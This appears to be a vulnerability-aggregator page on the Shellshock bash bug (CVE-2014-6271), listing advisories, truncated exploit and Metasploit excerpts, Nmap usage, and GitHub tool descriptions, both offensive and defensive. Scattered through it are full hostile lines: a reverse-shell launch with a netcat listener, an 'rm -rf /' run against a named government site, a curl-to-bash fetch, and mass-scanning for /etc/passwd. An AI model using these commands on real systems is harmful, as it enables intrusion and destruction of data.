CVSS v2 severity: 10 (HIGH)

CVE-2014-6271

Published: 24/09/2014 Updated: 30/11/2018
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

Vulnerability Summary

RHSA-2014:1295: bash Shift_JIS security update

Bash allowed bypassing environment restrictions in certain environments.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271.

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Access Complexity: LOW
Authentication: NONE
Access Vector: NETWORK
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE

Affected Products

Vendor: Gnu
Product: Bash
Versions: 1.14.0, 1.14.1, 1.14.2, 1.14.3, 1.14.4, 1.14.5, 1.14.6, 1.14.7, 2.0, 2.01, 2.01.1, 2.02, 2.02.1, 2.03, 2.04, 2.05, 3.0, 3.0.16, 3.1, 3.2, 3.2.48, 4.0, 4.1, 4.2, 4.3

Vendor Advisories

Bash allowed bypassing environment restrictions in certain environments ...
Stephane Chazelas discovered a vulnerability in bash, the GNU Bourne-Again Shell, related to how environment variables are processed. In many common configurations, this vulnerability is exploitable over the network, especially if bash has been configured as the system shell. For the stable distribution (wheezy), this problem has been fixed in vers ...
Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169). With this update prefix and suffix for environment variable names which contain shell functions are added as h ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue. We'd lik ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables. An attacker could use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue ...

Exploits

#!/usr/bin/env python # RedStar OS 30 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 30 These packages are the # recommended GUI configuration components and listen on # a user specified port from 100 ...
## ## This module requires Metasploit: metasploitcom/download ## Current source: githubcom/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' ...
#!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and e ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Smtp def initialize(info={}) super(update_info(info, 'Name' => 'Qmail SMTP Bash E ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ad ...
#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: /exploitpy var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker ...
Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: wwwciscocom/ Versions affected: <92, <1052, <1101 Severity: Low to medium Vendor notified: Yes Reported: Oct 2014 Public release: Aug 13th, 2015 ...
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: ww ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Fi ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(i ...
<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: wwwgnuorg/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: prakharprasadcom && appknoxcom Date: September 25th 2014 Tested on: Mac OS X 1094/1095 with Apac ...
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: wwwqnapcom # Version: ...
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH ex ...
# Exploit Title: PHP 5x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: phpnet # Software Link: phpnet/get/php-562tarbz2/from/a/mirror # Version: 5* (tested on 562) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 < ...
# Exploit Title: ShellShock OpenVPN Exploit # Date: Fri Oct 3 15:48:08 EDT 2014 # Exploit Author: hobbily AKA @fj33r # Version: 2229 # Tested on: Debian Linux # CVE : CVE-2014-6271 #Probably should of submitted this the day I tweeted it ### serverconf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn ...
#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/ # Version: 42x < 4248 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_sm ...
Exploit Database Note: The following is an excerpt from: securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. Th ...
#!/usr/bin/env python # # Exploit Title : IPFire <= 215 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : wwwipfireorg # # Software Link: downloadsipfireorg/releases/ipfire-2x/215-core82/ipfire-215i586-full-core82iso # # Date : 2014-09-29 # # Fixed v ...
# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: kemptechnologiescom/load-balancer/ # Version: 7116 and previous versions # Tested on: Kemp Load Master 71-16 # CVE : CVE-2014-5287/5288 Link: blogmalerischnet/2015/04/playing ...
#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/bash-43targz # Version: 4311 # Tested on: Ubuntu 14041 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ...

Mailing Lists

GNU Bash versions 4.3 and below remote command injection exploit that leverages the REFERER header on vulnerable CGI scripts. Launches a connect-back shell. Written in Perl ...
IPFire, a free linux based open source firewall distribution, versions 2.15 Update Core 82 and below contain an authenticated remote command execution vulnerability via shellshock in the request headers ...
IPFire versions 2.15 and below core 82 authenticated CGI remote command injection exploit that leverages the bash vulnerability ...
Cisco Unified Communications Manager versions prior to 1101, 1052, and 92 suffer from multiple command execution vulnerabilities ...
This abuses the bug in bash environment variables (CVE-2014-6271) to get a suid binary inside of VMWare Fusion to launch our payload as root ...
AIS shellshock scanning tool that leverages the User-Agent header against a large list of possible targets. Written in C ...
This Metasploit module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This Metasploit module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This Metasploit module was tested against firmware version 1322_D1.98 ...
bashedCgi is a quick and dirty Metasploit module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command ...
This is a proof of concept that demonstrates how the Bash shellshock vulnerability can be used in PHP to bypass disable_functions, safe_mode, etc ...
TrendMicro InterScan Web Security Virtual Appliance remote code execution exploit that leverages the shellshock vulnerability to spawn a connect-back shell. TrendMicro has contacted Packet Storm and provided the following link with patch information: success.trendmicro.com/solution/1105233 ...
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability ...
FutureNet NXR-G240 Series remote shellshock command injection exploit ...
This is a shellshock exploit for RSSMON and BEAM, network services for Red Star OS version 30 SERVER edition ...
Due to a processing issue with environment variables it is possible to leverage bash for command execution through various methodologies ...
This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default ...
This is information regarding more bash vulnerabilities and how the original bash patches are ineffective ...
DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability ...

Nmap Scripts

http-shellshock

Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

PORT   STATE SERVICE REASON
80/tcp open  http    syn-ack
| http-shellshock:
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known as Shellshock. It seems the server
|       is executing commands injected via malicious HTTP headers.
|
|     Disclosure date: 2014-09-24
|     References:
|       http://www.openwall.com/lists/oss-security/2014/09/24/10
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Metasploit Modules

IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.

msf > use exploit/linux/http/ipfire_bashbug_exec
msf exploit(ipfire_bashbug_exec) > show targets
    ...targets...
msf exploit(ipfire_bashbug_exec) > set TARGET <target-id>
msf exploit(ipfire_bashbug_exec) > show options
    ...show and set options...
msf exploit(ipfire_bashbug_exec) > exploit

DHCP Client Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.

msf > use auxiliary/server/dhclient_bash_env
msf auxiliary(dhclient_bash_env) > show actions
    ...actions...
msf auxiliary(dhclient_bash_env) > set ACTION <action-name>
msf auxiliary(dhclient_bash_env) > show options
    ...show and set options...
msf auxiliary(dhclient_bash_env) > run

Advantech Switch Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98.

msf > use exploit/linux/http/advantech_switch_bash_env_exec
msf exploit(advantech_switch_bash_env_exec) > show targets
    ...targets...
msf exploit(advantech_switch_bash_env_exec) > set TARGET <target-id>
msf exploit(advantech_switch_bash_env_exec) > show options
    ...show and set options...
msf exploit(advantech_switch_bash_env_exec) > exploit

Qmail SMTP Bash Environment Variable Injection (Shellshock)

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > show targets
    ...targets...
msf exploit(qmail_bash_env_exec) > set TARGET <target-id>
msf exploit(qmail_bash_env_exec) > show options
    ...show and set options...
msf exploit(qmail_bash_env_exec) > exploit

OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.

msf > use exploit/osx/local/vmware_bash_function_root
msf exploit(vmware_bash_function_root) > show targets
    ...targets...
msf exploit(vmware_bash_function_root) > set TARGET <target-id>
msf exploit(vmware_bash_function_root) > show options
    ...show and set options...
msf exploit(vmware_bash_function_root) > exploit

Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec
msf exploit(pureftpd_bash_env_exec) > show targets
    ...targets...
msf exploit(pureftpd_bash_env_exec) > set TARGET <target-id>
msf exploit(pureftpd_bash_env_exec) > show options
    ...show and set options...
msf exploit(pureftpd_bash_env_exec) > exploit

Dhclient Bash Environment Variable Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.

msf > use exploit/unix/dhcp/bash_environment
msf exploit(bash_environment) > show targets
    ...targets...
msf exploit(bash_environment) > set TARGET <target-id>
msf exploit(bash_environment) > show options
    ...show and set options...
msf exploit(bash_environment) > exploit

CUPS Filter Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is required to exploit this vulnerability through CUPS.

msf > use exploit/multi/http/cups_bash_env_exec
msf exploit(cups_bash_env_exec) > show targets
    ...targets...
msf exploit(cups_bash_env_exec) > set TARGET <target-id>
msf exploit(cups_bash_env_exec) > show options
    ...show and set options...
msf exploit(cups_bash_env_exec) > exploit

Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > show targets
    ...targets...
msf exploit(apache_mod_cgi_bash_env_exec) > set TARGET <target-id>
msf exploit(apache_mod_cgi_bash_env_exec) > show options
    ...show and set options...
msf exploit(apache_mod_cgi_bash_env_exec) > exploit

Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf auxiliary(apache_mod_cgi_bash_env) > show actions
    ...actions...
msf auxiliary(apache_mod_cgi_bash_env) > set ACTION <action-name>
msf auxiliary(apache_mod_cgi_bash_env) > show options
    ...show and set options...
msf auxiliary(apache_mod_cgi_bash_env) > run

Github Repositories

shellshocker-android This is an Android Application that helps you detect if your machine that runs bash is vulnerable to CVE-2014-6271 Stefano Belli, <(C) Copyleft, share, rebuild, modify, redistribute as you think it should be better Google+: plusgooglecom/+StefanoBelli WebSite: wwwinthebitit Next update ready, I will upload soon

cve-2014-6271-huan-lu reading course

shellshock_scanner Python Scanner for "ShellShock" (CVE-2014-6271)

shellshock-shell A simple python shell-like exploit for the Shellshock CVE-2014-6271 bug Use it to exploit known vulnerable URLs This tool may be used only on your own authorized URLs The author of this tool takes no responsibility for its usage File name: shellshockpy Author: Sagi Levy - Sagi@pwnguycom Date created: 27/09/2014 Python Version: 27 Example: /shellshockpy

pyshellshock Python library and utility for CVE-2014-6271

Patch for CVE-2014-6271 securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Usage install ansible on your local host add the servers you wish to patch to inventory run ansible-playbook /deployyml -i inventory

North Korea ICT 1 North Korea Internet 2 Redstar OS and Browser Redstar PC Redstar Server RedStar 30 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection [Exploit DB] wwwexploit-dbcom/exploits/40938/ [CVE-2014-6271] cvemitreorg/cgi-bin/cvenamecgi?name=cve-2014-6271 3 Security "See swsecurityml

shellshocker-python This is a Python Application that helps you detect if your machine that run Bash is vulnerable by CVE-2014-6271

Prerequisite sudo pip install shell install google python search githubcom/MarioVilas/google Run I use google to search first 1000 sites and try to get the /etc/passwd After testing, there are many many many host that can be rooted!!!! By the way, this is only a proto, it has false positives Output like this: if second field is !!!, then You Can Get SHELL! $ python

CVE-2014-6271 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2014-6271 Image author: githubcom/Medicean/VulApps/tree/master/b/bash/shellshock1_CVE-2014-6271

Google Chrome DoShtml Hover link to crash Google Chrome tab Shellshockpy CVE-2014-6271 cgi-bin exploit, create a reverse shell xsplitpy Script goes into the local database of XSPLIT and grabs the login creds/auth-token and much more Works only locally on a computer NinjaPypy Create python shellcode, one-line code only!

BLOG Keep notes of your study time References Blogs Fastersite Organization: Google Achievements: Google Chrome WebKit Speed Team Lead Keywords: Google Chrome, Speed, WebKit Stoyan’s phpiedcom Organization: Facebook, ex-Yahoo Achievements: Architect of the YSlow 20 performance tool creator of the smushit Books: Facebook, YSlow, Smushit JavaScript for PHP

libsecurity When we're talking about security, the internet is the true wild wild west of today and the problems doesn't seem to be disappearing anytime soon Until we find a way to create bulletproof server software we'll need a system in place to react as quick as possible to the release of new vulnerabilities Traditionally it can be very difficult for a softw

CVE DB About CVE DB is a sqlite DB with CVEs and Python API CVEs are scrapped from CVE Details Latest DB is from 17012017 Why? It seems there is no developer friendly CVE data available Usage DB Download latest sqlite DB from dbs and extract Python Updating DB with open('csv_listtxt', 'r') as csv_h: with CVE_DB() as db: for cve_na

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file 'sitestxt', and set connecti

CGIShell shellshock CVE-2014-6271 CGI Exploit Use like OpenSSH via CGI Page Use python cgishellpy 'wwwgooglecom/cve-2014-6271/poccgi' Screenshot Dependence Windows needed pyreadline It is not needed chardet Future Add TestCase HTTP Login Support http transmission gzip compression chardet identify and decode any bug fix Issues Windows Untest

bash-up a auto script to fix CVE-2014-6271 bash vulnerability

Nessus_CVE-2014-6271_check Quick and dirty nessus audit file to check if bash is vulnerable to CVE-2014-6271

debian-lenny-bash_3252-cve-2014-6271 Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64) You can test the flaw by running: env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

bash-fix-exploit A tiny role that checks to see if the CVE-2014-6271 exploit is still valid Use at your own risk Read about the exploit here: communityrapid7com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271 Requirements Assumes that you're using bash as your shell Role Variables update_bash - defaults to "no

CVE-2014-6271 patches for bash The original mailing list post only lets you fetch the patches over unauthenticated HTTP Sigh I've downloaded these over HTTP and put them into a git repository that you can fetch over HTTPS and check independently I have not checked whether these files are authentic, but you can check independently whether you have the same files Origin

CVE-2014-6271 Bash Shellshock (and Aftershock) Tester for Ansible Install Ansible docsansiblecom/intro_installationhtml Add servers to inventory file (example): username@ip Copy your public key to remote servers' ssh/authorized_keys execute test $ ansible-playbook -i inventory siteyml

bro-scripts Find us on the web at wwwCriticalStackcom Check out our new Intel Marketplace for Bro Repository includes a set of Bro scripts to be shared with the community CVE-2014-6271 Exploit Detector- The CVE-2014-6271 vulnerability in the venerable Bourne-Again SHell (BASH) is rated as a Level 10 allowing full, unauthenticated remote access to your systems; it's g

bash-CVE-2014-6271 Cookbook This Chef cookbook contains a default recipe that will fail your Chef run if a bash is found and that bash is vulnerable to the remote exploit described in CVE-2014-6271 The places to look for bash can be configured in the node['bash-CVE-2014-6271']['bashes'] attribute (see below) Requirements Should work on any UNIX/Linux Pleas

BadBash CVE-2014-6271 (ShellShock) RCE PoC tool ======= BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 Original github project : githubcom/RainMak3r/Rainstorm ========================================================

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage $ python testingpy --server 17216255130 --listen 172162551 ##Example Return: [+] Testing if 17216255130 is vulnerable to CVE-2014-6271 via CGI [+] Listening for incoming connections on the following socket 172162551:4443 [!] The server is vulnerable a

Shellshock-Vulnerability-Scan Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock Download app from play store playgooglecom/store/apps/details?id=inindiandragonshellshockshellshockvulnerabilityscan

====================== shellshock bash update This recipe tries to upgrade bash from OS pkg, and falls back to compile bash on systems with no update available Works for us on old ubuntu/debian Bash install script from: askubuntucom/questions/528101/what-is-the-cve-2014-6271-bash-vulnerability-and-how-do-i-fix-it Usage Can be used as an gitfs salt formula: fileserver_

patched-bash-43 patched-bash-43 for CVE-2014-6271 This is just bash 43 , pulled from the gnu website, and patched with the patches available on 9/26/2014, including the pkgsrc functionality changes that just disable the silly "execute functions in env variables" altogether The patches are also included here, but I've already applied them to the sourcecode (fo

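CVE-2014-6271py I wrote a script; the implementation uses a Google IP that is not blocked, so it can be used directly without a VPN to get past the firewall. Features: batch detection of the Bash vulnerability via Google; exploit a given URL; statistics, roughly to get a sense of how common the Bash vulnerability is (in testing, about one exploitable URL turned up per 500 URLs); write vulnerable URLs to a file. Usage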

Cgi-bin_bash_Reverse POC for CVE-2014-6271 Src:gistgithubcom/matjohn2/bc9689c60d4c9c5a2538

shellshock scripts associated with bourne shell EVN function parsing vulnerability CVE-2014-6271 dhcp_monpy - This script monitors DHCP frames for potentially malicious characters within BOOTP and DHCP reply fields

CVE-2014-6271 python27 Start listening on your machine nc -l -p 4444 Run python script by the rule below: python shellpocpy <host> <vulnerable CGI> <attackhost/IP> python shellpocpy 101010101 /cgi-bin/status 1010101/4444 Enjoy

================================================================================================ BadBash is a CVE-2014-6271 RCE exploit tool The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234 Developer : Andy Yang Version : 010 License : GPLv3 ===============================================================================

CVE-2014-6271

shocknaww Simple script to check for CVE-2014-6271 Example Usage /shocknawwpy foobar/cgi-bin/foo Sample vulnerable environment From the parent directory, run the following python -m CGIHTTPServer Now use shocknaww against your localhost test server /shocknawwpy 127001:8000/testpy

shellshock-Ansible This is a proof-of-principle to show that Ansible can be used to patch BASH on OS X Specifically for CVE-2014-6271 and CVE-2014-7169 Work in this project is based off of the posting(s) of alblue - albluebandlemcom Main reference is his evolving post applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploi

Check this thread on stackexchange The script has been taken from there: applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-the-remote-exploit-cve-2014-6271 IMPORTANT: Install Xcode before executing the script! Usage git clone git@githubcom:mdix/OSX-bash-fixgit cd OSX-bash-fix chmod +x *sh /buildsh # If buildsh went well, your patched bash ha

CLI tool to check via nodejs if you have a vulnerable bash Shellshock (CVE-2014-6271) Install npm install shellshock -g Execute shellshock Output ✗ vulnerable bash or ✓ bash not vulnerable Contributors neydroid

CVE-2014-6271 An automated way to fix bash Testing for the Vulnerability You can determine if you are vulnerable by executing this test: env x='() { :;}; echo vulnerable' bash -c 'echo hello' Fixing Vulnerability Run this on the command line You may be prompted to enter your password bash <( curl -s rawgithubusercontentcom/mattclegg/CVE-20

Autoit Malware Scripts A series of scripts written around 2014/15 Made entirely for fun and learning Keep in mind that all of these scripts were tested on the Windows 7 operating system as well as on that year's versions of Safari, Chrome and Opera RunPE - RunPEx64 A RunPE is a script made to run

CVE-2014-6271 Script to attack shellshock vulnerability [!] Usage: /ShockZaum -u 'nasagov' -c 'rm -rf /' -p '/cgi-bin/alienscgi'

Voxer Nagios Plugins Plugins for nagios used by Voxer, made specifically for SmartOS Plugins check_shellshock Check bash for CVE-2014-6271 (shellshock) $ check_shellshock ok: bash is secure against shellshock You can pass an optional binary to check as the first argument, defaults to bash in your $PATH $ check_shellshock /bin/bash critical: /bin/bash is vulnerable to shellshoc

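About US Purpose Create places and opportunities for sharing information about, and working on, {something} Activities Regular meetings Held every other week. For the time being we will try holding them in freely available spaces. We will take care not to monopolize them. Content (this is a draft; suggestions are welcome) Short presentations and sharing I wrote this code This tool or language is handy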

shellshock-hunter-google Search Google and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock Installation Requires Python 27 pip install --user selenium gevent git clone githubcom/DanMcInerney/shellshock-hunter-google cd shellshock-hunter-google/ Example python shellshock-hunter-googlepy -

shellshock-hunter Search Bing and concurrently test each result for vulnerability to CVE-2014-6271: remote code execute bug in bash otherwise known as Shellshock Usage git clone githubcom/DanMcInerney/shellshock-hunter cd shellshock-hunter/ python shellshock-hunter -s "search_terms" -k your_bing_api_key -p number_of_pages_to_check -p will default to 1 page g

This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible Supported platforms: Debian (5, 6, 7) Ubuntus (1204 LTS, 1404 LTS, 1410) RHEL/CentOS (5, 6) Usage class {'shellshock': } Facter provided facter -p shellshock not_vulnerable Author Renan Vicente (@renanvicent

PHP-Webshells-Collection Most Wanted Private and Public PHP Web Shells Can Be Downloaded Here (Educational Purpose Only) I am not responsible for how you use this stuff Default Password for All Shells (if not available in shell description): wso Tools PHP deobfuscators: Online: FOPO PHP Deobfuscator ver 01 | ver 02 Sucuri's PHP decoder Toolki's PHP decoder un

Awesome Security A collection of awesome software, libraries, documents, books, resources and cool stuff about security Inspired by awesome-php, awesome-python Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources Awesome Security Network Scann

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honeypot or easily deployed by Modern Honey Network (MHN): githubcom/threatstream/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt Configuration Edit shockpotco

Shellshock Burp Plugin A burp plugin to provide active scanning for CVE-2014-6271 against Apache's MOD_CGI Download Compiled to Java 6 for luddites and the like Download here! Building mvn package

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

A scanner for SIP proxies vulnerable to Shellshock Usage: sipshock [ Flags ] [ IP Addresses ] Usage flags: lhost : Local listening address lport : Local listening port (default 10111) rport : Remote port (default 5060) The exec module in Kamailio, Opensips and probably every other SER fork passes the received SIP headers as environment variables to the invoking shell This

